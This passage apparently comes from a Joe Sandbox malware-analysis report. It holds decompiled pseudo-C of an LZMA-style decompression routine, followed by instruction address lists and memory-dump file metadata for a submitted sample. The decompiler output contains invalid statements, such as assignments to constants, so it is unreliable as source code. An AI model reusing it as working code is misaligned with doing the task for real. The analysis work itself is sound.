												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00407033
0x00407033
0x00407033
0x00407033
0x00407039
0x0040703d
0x00407041
0x0040704b
0x00407059
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00407366
0x00407366
0x0040736a
0x00000000
0x00000000
0x0040736c
0x00407375
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738d
0x004073a6
0x004073a9
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x0040739e
0x004073a1
0x004073a1
0x004073c3
0x00407363
0x00407363
0x00407363
0x00407366
0x0040736a
0x00000000
0x00000000
0x00000000
0x004073c5
0x004073c5
0x0040733e
0x00407342
0x0040747a
0x0040747a
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x00407348
0x0040734e
0x00407355
0x0040735d
0x0040735d
0x00407360
0x00000000
0x00407360
0x004073ca
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00406a91
0x00000000
0x00406a98
0x00406a9c
0x00000000
0x00000000
0x00406aa2
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406afd
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x004073ed
0x00000000
0x004073ed
0x00406b47
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b71
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x004073fc
0x00000000
0x004073fc
0x00406bb7
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x0040746e
0x00000000
0x0040746e
0x004072c5
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x00000000
0x00406bfe
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00407450
0x00000000
0x00407450
0x0040712f
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407234
0x00407238
0x0040725a
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040723a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x0040732f
0x00407332
0x00407339
0x00000000
0x0040733c
0x004072f7
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e2
0x004073e5
0x004072e6
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x00000000
0x0040701c
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x0040733c
0x00000000
0x00000000
0x00000000
0x00407061
0x00407061
0x00407064
0x0040709a
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fa
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x00407366
0x0040732f

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
